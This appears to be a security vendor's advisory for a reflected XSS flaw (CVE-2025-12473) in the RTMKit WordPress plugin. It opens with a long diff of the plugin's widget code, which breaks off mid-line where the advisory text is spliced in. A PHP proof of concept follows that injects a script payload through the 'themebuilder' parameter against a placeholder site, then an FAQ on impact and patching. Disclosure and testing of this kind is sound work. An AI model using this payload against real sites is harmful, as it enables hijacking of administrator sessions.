+ '{{WRAPPER}} .rkit-accordion__icon' => 'width: {{SIZE}}{{UNIT}};',
+ ],
+ ]
+ );
+
+ $this->add_responsive_control(
+ 'icon_box_height',
+ [
+ 'label' => esc_html__('Box height', 'rometheme-for-elementor'),
+ 'type' => ElementorControls_Manager::SLIDER,
+ 'size_units' => ['px', '%', 'em', 'rem', 'custom'],
+ 'range' => [
+ 'px' => [
+ 'min' => 0,
+ 'max' => 1000,
+ 'step' => 5,
+ ],
+ '%' => [
+ 'min' => 0,
+ 'max' => 100,
+ ],
+ ],
+ 'selectors' => [
+ '{{WRAPPER}} .rkit-accordion__icon' => 'height: {{SIZE}}{{UNIT}};',
+ ],
+ ]
+ );
+
+ $this->add_responsive_control(
+ 'icon_box_margin',
+ [
+ 'label' => esc_html__('Margin', 'rometheme-for-elementor'),
+ 'type' => ElementorControls_Manager::DIMENSIONS,
+ 'size_units' => ['px', '%', 'em', 'rem', 'custom'],
+ 'selectors' => [
+ '{{WRAPPER}} .rkit-accordion__icon' => 'margin: {{TOP}}{{UNIT}} {{RIGHT}}{{UNIT}} {{BOTTOM}}{{UNIT}} {{LEFT}}{{UNIT}};',
+ ],
+ ]
+ );
+
+
+ $this->start_controls_tabs('icon_tabs');
+
+ $this->start_controls_tab('icon_tab_close', ['label' => esc_html('Close')]);
+
+ $this->add_control('icon_color_close', [
+ 'label' => esc_html('Icon Color'),
+ 'type' => ElementorControls_Manager::COLOR,
+ 'selectors' => [
+ '{{WRAPPER}} .rkit-accordion__icon .icon_close , .rkit-accordion__icon .icon_open' => 'color:{{VALUE}} ; fill:{{VALUE}}'
+ ]
+ ]);
+
+ $this->add_control(
+ 'icon_bg_hr_close',
+ [
+ 'type' => ElementorControls_Manager::DIVIDER,
+ ]
+ );
+
+ $this->add_group_control(
+ ElementorGroup_Control_Background::get_type(),
+ [
+ 'name' => 'icon_background_close',
+ 'types' => ['classic', 'gradient'],
+ 'selector' => '{{WRAPPER}} .rkit-accordion__icon',
+ ]
+ );
+
+ $this->add_control(
+ 'icon_border_hr_close',
+ [
+ 'type' => ElementorControls_Manager::DIVIDER,
+ ]
+ );
+
+ $this->add_group_control(
+ ElementorGroup_Control_Border::get_type(),
+ [
+ 'name' => 'icon_border_close',
+ 'selector' => '{{WRAPPER}} .rkit-accordion__icon',
+ ]
+ );
+
+ $this->add_group_control(
+ ElementorGroup_Control_Box_Shadow::get_type(),
+ [
+ 'name' => 'icon_box_shadow_close',
+ 'selector' => '{{WRAPPER}} .rkit-accordion__icon',
+ ]
+ );
+
+ $this->end_controls_tab();
+
+ $this->start_controls_tab('icon_tab_open', ['label' => esc_html('Open')]);
+
+ $this->add_control('icon_color_open', [
+ 'label' => esc_html('Icon Color'),
+ 'type' => ElementorControls_Manager::COLOR,
+ 'selectors' => [
+ '{{WRAPPER}} .rkit-accordion-item.open .rkit-accordion__icon .icon_open , .rkit-accordion-item.open .rkit-accordion__icon .icon_close' => 'color:{{VALUE}} ; fill:{{VALUE}}'
+ ]
+ ]);
+
+ $this->add_control(
+ 'icon_bg_hr_open',
+ [
+ 'type' => ElementorControls_Manager::DIVIDER,
+ ]
+ );
+
+ $this->add_group_control(
+ ElementorGroup_Control_Background::get_type(),
+ [
+ 'name' => 'icon_background_open',
+ 'types' => ['classic', 'gradient'],
+ 'selector' => '{{WRAPPER}} .rkit-accordion-item.open .rkit-accordion__icon',
+ ]
+ );
+
+ $this->add_control(
+ 'icon_border_hr_open',
+ [
+ 'type' => ElementorControls_Manager::DIVIDER,
+ ]
+ );
+
+ $this->add_group_control(
+ ElementorGroup_Control_Border::get_type(),
+ [
+ 'name' => 'icon_border_open',
+ 'selector' => '{{WRAPPER}} .rkit-accordion-item.open .rkit-accordion__icon',
+ ]
+ );
+
+ $this->add_group_control(
+ ElementorGroup_Control_Box_Shadow::get_type(),
+ [
+ 'name' => 'icon_box_shadow_open',
+ 'selector' => '{{WRAPPER}} .rkit-accordion-item.open .rkit-accordion__icon',
+ ]
+ );
+
+ $this->end_controls_tab();
+
+ $this->start_controls_tab('icon_tab_hover', ['label' => esc_html('Hover')]);
+
+ $this->add_control('icon_color_hover', [
+ 'label' => esc_html('Icon Color'),
+ 'type' => ElementorControls_Manager::COLOR,
+ 'selectors' => [
+ '{{WRAPPER}} .rkit-accordion-header:hover .rkit-accordion__icon .icon_close , .rkit-accordion-header:hover .rkit-accordion__icon .icon_open' => 'color:{{VALUE}} ; fill:{{VALUE}}'
+ ]
+ ]);
+
+ $this->add_control(
+ 'icon_bg_hr_hover',
+ [
+ 'type' => ElementorControls_Manager::DIVIDER,
+ ]
+ );
+
+ $this->add_group_control(
+ ElementorGroup_Control_Background::get_type(),
+ [
+ 'name' => 'icon_background_hover',
+ 'types' => ['classic', 'gradient'],
+ 'selector' => '{{WRAPPER}} .rkit-accordion-header:hover .rkit-accordion__icon',
+ ]
+ );
+
+ $this->add_control(
+ 'icon_border_hr_hover',
+ [
+ 'type' => ElementorControls_Manager::DIVIDER,
+ ]
+ );
+
+ $this->add_group_control(
+ ElementorGroup_Control_Border::get_type(),
+ [
+ 'name' => 'icon_border_hover',
+ 'selector' => '{{WRAPPER}} .rkit-accordion-header:hover .rkit-accordion__icon',
+ ]
+ );
+
+
+ $this->add_group_control(
+ ElementorGroup_Control_Box_Shadow::get_type(),
+ [
+ 'name' => 'icon_box_shadow_hover',
+ 'selector' => '{{WRAPPER}} .rkit-accordion-header:hover .rkit-accordion__icon',
+ ]
+ );
+
+ $this->end_controls_tab();
+
+ $this->end_controls_tabs();
+
+ // divider control border radius
+ $this->add_control(
+ 'border_radius_divider',
+ [
+ 'type' => ElementorControls_Manager::DIVIDER,
+ ]
+ );
+
+ $this->add_responsive_control(
+ 'icon_box_radius',
+ [
+ 'label' => esc_html__('Border Radius', 'rometheme-for-elementor'),
+ 'type' => ElementorControls_Manager::DIMENSIONS,
+ 'size_units' => ['px', '%', 'em', 'rem', 'custom'],
+ 'selectors' => [
+ '{{WRAPPER}} .rkit-accordion__icon' => 'border-radius: {{TOP}}{{UNIT}} {{RIGHT}}{{UNIT}} {{BOTTOM}}{{UNIT}} {{LEFT}}{{UNIT}};',
+ ],
+ ]
+ );
+
+ $this->end_controls_section();
+
+ $this->start_controls_section('left_header_icon_style', [
+ 'label' => esc_html('Title Icon'),
+ 'tab' => ElementorControls_Manager::TAB_STYLE,
+ 'condition' => [
+ 'show_heading_icons' => 'yes'
+ ]
+ ]);
+
+ $this->add_responsive_control(
+ 'left_header_icon_size',
+ [
+ 'label' => esc_html__('Size', 'rometheme-for-elementor'),
+ 'type' => ElementorControls_Manager::SLIDER,
+ 'size_units' => ['px', '%', 'em', 'rem', 'custom'],
+ 'range' => [
+ 'px' => [
+ 'min' => 0,
+ 'max' => 1000,
+ 'step' => 5,
+ ],
+ '%' => [
+ 'min' => 0,
+ 'max' => 100,
+ ],
+ ],
+ 'selectors' => [
+ '{{WRAPPER}} .rkit-left-header-icon .accordion_header_icon' => 'font-size: {{SIZE}}{{UNIT}}; width:{{SIZE}}{{UNIT}} ; height:{{SIZE}}{{UNIT}};',
+ ],
+ ]
+ );
+
+ $this->add_control('left_header_icon_color', [
+ 'label' => esc_html('Color'),
+ 'type' => ElementorControls_Manager::COLOR,
+ 'selectors' => [
+ '{{WRAPPER}} .rkit-left-header-icon .accordion_header_icon' => 'color:{{VALUE}} ; fill:{{VALUE}}'
+ ]
+ ]);
+
+ $this->add_control('left_header_icon_bg_color', [
+ 'label' => esc_html('Background Color'),
+ 'type' => ElementorControls_Manager::COLOR,
+ 'selectors' => [
+ '{{WRAPPER}} .rkit-accordion-header .rkit-left-header-icon' => 'background-color:{{VALUE}};'
+ ]
+ ]);
+
+ $this->end_controls_section();
+
+ $this->start_controls_section('content_style', [
+ 'label' => esc_html('Content'),
+ 'tab' => ElementorControls_Manager::TAB_STYLE
+ ]);
+
+ $this->add_responsive_control(
+ 'content_text_align',
+ [
+ 'label' => esc_html__('Alignment', 'rometheme-for-elementor'),
+ 'type' => ElementorControls_Manager::CHOOSE,
+ 'options' => [
+ 'left' => [
+ 'title' => esc_html__('Left', 'rometheme-for-elementor'),
+ 'icon' => 'eicon-text-align-left',
+ ],
+ 'center' => [
+ 'title' => esc_html__('Center', 'rometheme-for-elementor'),
+ 'icon' => 'eicon-text-align-center',
+ ],
+ 'right' => [
+ 'title' => esc_html__('Right', 'rometheme-for-elementor'),
+ 'icon' => 'eicon-text-align-right',
+ ],
+ 'justify' => [
+ 'title' => esc_html__('Justify', 'rometheme-for-elementor'),
+ 'icon' => 'eicon-text-align-justify',
+ ],
+ ],
+ 'default' => 'left',
+ 'toggle' => true,
+ 'selectors' => [
+ '{{WRAPPER}} .rkit-accordion__content' => 'text-align: {{VALUE}};',
+ ],
+ ]
+ );
+
+ $this->add_group_control(
+ ElementorGroup_Control_Typography::get_type(),
+ [
+ 'name' => 'content_typography',
+ 'selector' => '{{WRAPPER}} .rkit-accordion__content',
+ ]
+ );
+
+ $this->add_control('content_color', [
+ 'label' => esc_html('Text Color'),
+ 'type' => ElementorControls_Manager::COLOR,
+ 'selectors' => [
+ '{{WRAPPER}} .rkit-accordion__content' => 'color:{{VALUE}}'
+ ]
+ ]);
+
+ $this->add_group_control(
+ ElementorGroup_Control_Text_Shadow::get_type(),
+ [
+ 'name' => 'content_text_shadow',
+ 'selector' => '{{WRAPPER}} .rkit-accordion__content',
+ ]
+ );
+
+
+ $this->add_group_control(
+ ElementorGroup_Control_Background::get_type(),
+ [
+ 'name' => 'background',
+ 'types' => ['classic', 'gradient'],
+ 'selector' => '{{WRAPPER}} .rkit-accordion__content',
+ ]
+ );
+
+ $this->add_group_control(
+ ElementorGroup_Control_Border::get_type(),
+ [
+ 'name' => 'border_content',
+ 'selector' => '{{WRAPPER}} .rkit-accordion__content',
+ ]
+ );
+
+ $this->add_responsive_control(
+ 'content_radius',
+ [
+ 'label' => esc_html__('Border Radius', 'rometheme-for-elementor'),
+ 'type' => ElementorControls_Manager::DIMENSIONS,
+ 'size_units' => ['px', '%', 'em', 'rem', 'custom'],
+ 'selectors' => [
+ '{{WRAPPER}} .rkit-accordion__content' => 'border-radius: {{TOP}}{{UNIT}} {{RIGHT}}{{UNIT}} {{BOTTOM}}{{UNIT}} {{LEFT}}{{UNIT}};',
+ ],
+ ]
+ );
+
+ $this->add_responsive_control(
+ 'content_padding',
+ [
+ 'label' => esc_html__('Padding', 'rometheme-for-elementor'),
+ 'type' => ElementorControls_Manager::DIMENSIONS,
+ 'size_units' => ['px', '%', 'em', 'rem', 'custom'],
+ 'selectors' => [
+ '{{WRAPPER}} .rkit-accordion__content' => 'padding: {{TOP}}{{UNIT}} {{RIGHT}}{{UNIT}} {{BOTTOM}}{{UNIT}} {{LEFT}}{{UNIT}};',
+ ],
+ ]
+ );
+
+ $this->end_controls_section();
+ }
+
+ protected function render_edit_template_button($item)
+ {
+ if (ElementorPlugin::$instance->editor->is_edit_mode()) {
+?>
+ <a href="<?php echo admin_url("post.php?post={$item}&action=elementor") ?>"
+ class="accordion-edit-template-btn btn">
+ Edit Saved Template <i class="eicon-edit" aria-hidden="true"></i>
+ </a>
+ <?php
+ }
+ }
+ protected function render()
+ {
+ $settings = $this->get_settings_for_display();
+ $no = 0;
+
+ switch ($settings['title_tag']) {
+ case 'h1':
+ $title_tag = 'h1';
+ break;
+ case 'h2':
+ $title_tag = 'h2';
+ break;
+ case 'h3':
+ $title_tag = 'h3';
+ break;
+ case 'h4':
+ $title_tag = 'h4';
+ break;
+ case 'h5':
+ $title_tag = 'h5';
+ break;
+ case 'h6':
+ $title_tag = 'h6';
+ break;
+ case 'span':
+ $title_tag = 'span';
+ break;
+ case 'div':
+ $title_tag = 'div';
+ break;
+ default:
+ $title_tag = 'h3';
+ break;
+ }
+
+ ?>
+
+ <div class="rkit-accordion">
+ <?php foreach ($settings['list_items'] as $item) : $no = $no + 1; ?>
+ <div class="rkit-accordion-item <?php echo ($item['open_default'] === 'yes') ? 'open' : '' ?>">
+ <div class="rkit-accordion-header">
+ <?php if (!empty($settings['show_heading_icons'])) { ?>
+ <div class="rkit-left-header-icon">
+ <?php ElementorIcons_Manager::render_icon($item['accordion_header_icon'], ['aria-hidden' => 'true', 'class' => 'accordion_header_icon']); ?>
+ </div>
+ <?php } ?>
+ <div class="rkit-accordion-header-text">
+ <<?php echo esc_attr($title_tag) ?> class="rkit-accordion__title">
+ <?php
+ if ($settings['show_loop_count'] === 'yes') {
+ if ($settings['show_zero_padded'] === 'yes') {
+ $padded = str_pad($no, 2, '0', STR_PAD_LEFT);
+ echo esc_html($padded . '. ');
+ } else {
+ echo esc_html($no . '. ');
+ }
+ }
+ echo esc_html($item['accordion_title'])
+ ?>
+ </<?php echo esc_attr($title_tag) ?>>
+ <?php if (!empty($settings['show_subheading'])) { ?>
+ <span class="header-subtitle"><?php echo $item['accordion_sub_title'] ?></span>
+ <?php } ?>
+ </div>
+ <div class="rkit-accordion__icon">
+ <?php ElementorIcons_Manager::render_icon($settings['icon_close'], ['aria-hidden' => 'true', 'class' => 'icon_close']); ?>
+ <?php ElementorIcons_Manager::render_icon($settings['icon_open'], ['aria-hidden' => 'true', 'class' => 'icon_open']); ?>
+ </div>
+ </div>
+ <div class="rkit-accordion-content">
+ <div class="rkit-accordion__content">
+ <?php
+ if ($item['description_type'] == 'description') {
+ echo wp_kses_post($item['item_description']);
+ } else {
+ $template = get_post($item['item_template']);
+ if (!empty($template)) { ?>
+ <div class="rkit-custom-content-wrapper" <?php echo (ElementorPlugin::$instance->editor->is_edit_mode()) ? 'saved-template="true"' : '' ?>>
+ <?php
+ echo RTMKitModulesWidgetsWidgetModule::instance()->render_edit_template_button($item['item_template'], get_queried_object_id());
+ echo ElementorPlugin::instance()->frontend->get_builder_content_for_display($item['item_template']);
+ ?>
+ </div>
+ <?php }
+ }
+ ?>
+ </div>
+ </div>
+ </div>
+ <?php endforeach; ?>
+ </div>
+
+<?php
+ }
+}
--- a/rometheme-for-elementor/Inc/Elements/AdvancedHeading.php
+++ b/rometheme-for-elementor/Inc/Elements/AdvancedHeading.php
@@ -0,0 +1,922 @@
+<?php
+
+namespace RTMKitElements;
+
+class AdvancedHeading extends ElementorWidget_Base
+{
+ private function get_widget_data()
+ {
+ return RTMkitModulesWidgetsWidgetStorage::instance()->get_widget_data_by_key('advancedheading');
+ }
+
+ public function get_name()
+ {
+ return 'rkit_advanced_heading';
+ }
+ public function get_title()
+ {
+ return $this->get_widget_data()['name'];
+ }
+
+ public function get_icon()
+ {
+ $icon = 'rkit-widget-icon ' . $this->get_widget_data()['icon'];
+ return $icon;
+ }
+
+ public function get_keywords()
+ {
+ return ['rometheme', 'heading', 'animation', 'advanced', 'animation text', ' heading'];
+ }
+
+ function get_custom_help_url()
+ {
+ return 'https://support.rometheme.net/docs/romethemekit/widgets/how-to-use-ezd_ampersand-customize-advanced-heading-widget/';
+ }
+
+ public function get_categories()
+ {
+ return ['romethemekit_widgets'];
+ }
+
+ public function get_style_depends()
+ {
+ return ['rtmkit-element-advanced_heading'];
+ }
+ protected function is_dynamic_content(): bool
+ {
+ return false;
+ }
+ protected function register_controls()
+ {
+ $this->start_controls_section(
+ 'content_section',
+ [
+ 'label' => esc_html__('Content', 'rometheme-kit'),
+ ]
+ );
+
+ $this->add_control(
+ 'text',
+ [
+ 'label' => esc_html__('Text', 'rometheme-for-elementor'),
+ 'type' => ElementorControls_Manager::TEXTAREA,
+ 'rows' => 10,
+ 'default' => esc_html__('Example {{Headline Text}} for this {{Faster}} Page', 'rometheme-for-elementor'),
+ 'placeholder' => esc_html__('Type your text here', 'rometheme-for-elementor'),
+ 'description' => esc_html('The {{ }} symbols are used to indicate that the text will be given animation effects. If there are multiple texts, separate them with commas inside the {{ }}.')
+ ]
+ );
+
+ $this->add_control('html_tag', [
+ 'label' => esc_html('HTML Tag'),
+ 'type' => ElementorControls_Manager::SELECT,
+ 'options' => [
+ 'h1' => esc_html('H1'),
+ 'h2' => esc_html('H2'),
+ 'h3' => esc_html('H3'),
+ 'h4' => esc_html('H4'),
+ 'h5' => esc_html('H5'),
+ 'h6' => esc_html('H6'),
+ ],
+ 'default' => 'h1'
+ ]);
+
+ $this->add_control(
+ '_link',
+ [
+ 'label' => esc_html__('Link', 'rometheme-for-elementor'),
+ 'type' => ElementorControls_Manager::URL,
+ 'placeholder' => esc_html__('https://your-link.com', 'rometheme-for-elementor'),
+ 'options' => ['url', 'is_external', 'nofollow'],
+ 'default' => [
+ 'url' => '',
+ 'is_external' => true,
+ 'nofollow' => true,
+ ],
+ 'label_block' => true,
+ ]
+ );
+
+ $this->end_controls_section();
+
+ $this->start_controls_section('background_text', [
+ 'label' => esc_html('Background Text'),
+ 'tab' => ElementorControls_Manager::TAB_CONTENT
+ ]);
+
+ $this->add_control(
+ 'show_background_text',
+ [
+ 'label' => esc_html__('Use Background Text', 'textdomain'),
+ 'type' => ElementorControls_Manager::SWITCHER,
+ 'label_on' => esc_html__('Yes', 'textdomain'),
+ 'label_off' => esc_html__('No', 'textdomain'),
+ 'return_value' => 'yes',
+ 'default' => '',
+ ]
+ );
+
+ $this->add_control('background_text_heading', [
+ 'type' => ElementorControls_Manager::TEXT,
+ 'label' => esc_html('Text'),
+ 'default' => esc_html('Awesome Heading'),
+ 'condition' => [
+ 'show_background_text' => 'yes'
+ ]
+ ]);
+
+ $this->end_controls_section();
+
+ $this->start_controls_section(
+ 'wrapper_style',
+ [
+ 'label' => esc_html__('Wrapper', 'rometheme-kit'),
+ 'tab' => ElementorControls_Manager::TAB_STYLE,
+ ]
+ );
+
+ $this->add_responsive_control(
+ 'alignment',
+ [
+ 'label' => esc_html__('Alignment', 'rometheme-kit'),
+ 'type' => ElementorControls_Manager::CHOOSE,
+ 'options' => [
+ 'left' => [
+ 'title' => esc_html__('Left', 'rometheme-kit'),
+ 'icon' => 'eicon-text-align-left',
+ ],
+ 'center' => [
+ 'title' => esc_html__('Center', 'rometheme-kit'),
+ 'icon' => 'eicon-text-align-center',
+ ],
+ 'right' =Proof of Concept (PHP)
NOTICE :
This proof-of-concept is provided for educational and authorized security research purposes only.
You may not use this code against any system, application, or network without explicit prior authorization from the system owner.
Unauthorized access, testing, or interference with systems may violate applicable laws and regulations in your jurisdiction.
This code is intended solely to illustrate the nature of a publicly disclosed vulnerability in a controlled environment and may be incomplete, unsafe, or unsuitable for real-world use.
By accessing or using this information, you acknowledge that you are solely responsible for your actions and compliance with applicable laws.
PHP PoC
// ==========================================================================
// Atomic Edge CVE Research | https://atomicedge.io
// Copyright (c) Atomic Edge. All rights reserved.
//
// LEGAL DISCLAIMER:
// This proof-of-concept is provided for authorized security testing and
// educational purposes only. Use of this code against systems without
// explicit written permission from the system owner is prohibited and may
// violate applicable laws including the Computer Fraud and Abuse Act (USA),
// Criminal Code s.342.1 (Canada), and the EU NIS2 Directive / national
// computer misuse statutes. This code is provided "AS IS" without warranty
// of any kind. Atomic Edge and its authors accept no liability for misuse,
// damages, or legal consequences arising from the use of this code. You are
// solely responsible for ensuring compliance with all applicable laws in
// your jurisdiction before use.
// ==========================================================================
// Atomic Edge CVE Research - Proof of Concept
// CVE-2025-12473 - RTMKit <= 1.6.8 - Reflected Cross-Site Scripting via 'themebuilder' Parameter
<?php
$target_url = 'http://vulnerable-site.com/wp-admin/admin.php?page=rtmkit';
$payload = '<script>alert(document.domain)</script>';
$exploit_url = $target_url . '&themebuilder=' . urlencode($payload);
$ch = curl_init();
curl_setopt($ch, CURLOPT_URL, $exploit_url);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, false);
curl_setopt($ch, CURLOPT_SSL_VERIFYHOST, false);
curl_setopt($ch, CURLOPT_FOLLOWLOCATION, true);
curl_setopt($ch, CURLOPT_USERAGENT, 'Mozilla/5.0 Atomic Edge PoC');
$response = curl_exec($ch);
$http_code = curl_getinfo($ch, CURLINFO_HTTP_CODE);
curl_close($ch);
if (strpos($response, $payload) !== false) {
echo "[+] Vulnerability likely present. Payload found in response.n";
echo "[+] Exploit URL: $exploit_urln";
} else {
echo "[-] No immediate evidence of vulnerability in response.n";
}
?>Frequently Asked Questions
What is CVE-2025-12473?
Understanding the vulnerabilityCVE-2025-12473 is a reflected cross-site scripting (XSS) vulnerability found in the RTMKit plugin for WordPress, specifically affecting versions up to and including 1.6.8. The vulnerability arises from insufficient input sanitization and output escaping for the ‘themebuilder’ parameter, allowing attackers to inject arbitrary scripts.
How does the vulnerability work?
Mechanism of exploitationThe vulnerability allows unauthenticated attackers to craft a malicious URL containing a JavaScript payload in the ‘themebuilder’ parameter. If an administrator clicks on this link, the payload executes in their browser, potentially leading to session hijacking or other malicious actions.
Who is affected by this vulnerability?
Identifying impacted usersAny WordPress site using the RTMKit plugin version 1.6.8 or earlier is affected by this vulnerability. Site administrators should verify their plugin version to determine if they are at risk.
How can I check if my site is vulnerable?
Verification stepsTo check if your site is vulnerable, confirm that you are using RTMKit version 1.6.8 or earlier. Additionally, you can test for the vulnerability by attempting to access a crafted URL with the ‘themebuilder’ parameter and observing if the payload executes.
How can I fix or mitigate this issue?
Recommended actionsThe recommended fix is to update the RTMKit plugin to version 2.0.0 or later, where the vulnerability has been patched. Always ensure that your plugins are kept up to date to mitigate security risks.
What does the CVSS score of 6.1 indicate?
Understanding severity levelsA CVSS score of 6.1 indicates a medium severity level, suggesting that while the vulnerability is not critical, it poses a significant risk to the affected systems. Administrators should prioritize addressing this vulnerability to prevent potential exploitation.
What is reflected cross-site scripting?
Explaining the XSS typeReflected cross-site scripting (XSS) occurs when an attacker sends a malicious script that is reflected off a web server, typically via a URL parameter. When a victim clicks the link, the script executes in their browser, potentially allowing the attacker to steal information or perform actions on behalf of the user.
How does the proof of concept demonstrate the vulnerability?
Exploit illustrationThe proof of concept provided shows how an attacker can construct a URL with a script payload in the ‘themebuilder’ parameter. If an administrator accesses this URL, the script executes, confirming the presence of the vulnerability and demonstrating the risk of exploitation.
What are the potential consequences of this vulnerability?
Impact analysisIf exploited, this vulnerability can lead to session hijacking, unauthorized actions performed in the admin area, or even full site compromise. Attackers could deface the site or install malicious plugins, significantly impacting site integrity and security.
What should I do if I cannot update the plugin immediately?
Mitigation strategiesIf immediate updates are not possible, consider disabling the RTMKit plugin until it can be updated. Additionally, review user access controls and educate administrators about the risks of clicking unknown links.
How can I stay informed about similar vulnerabilities?
Keeping up with security updatesTo stay informed about vulnerabilities, regularly check security advisories from sources like the WordPress Plugin Repository, CVE databases, and security blogs. Subscribing to security mailing lists can also provide timely updates on new vulnerabilities.
How Atomic Edge Works
Simple Setup. Powerful Security.
Atomic Edge acts as a security layer between your website & the internet. Our AI inspection and analysis engine auto blocks threats before traditional firewall services can inspect, research and build archaic regex filters.
Trusted by Developers & Organizations
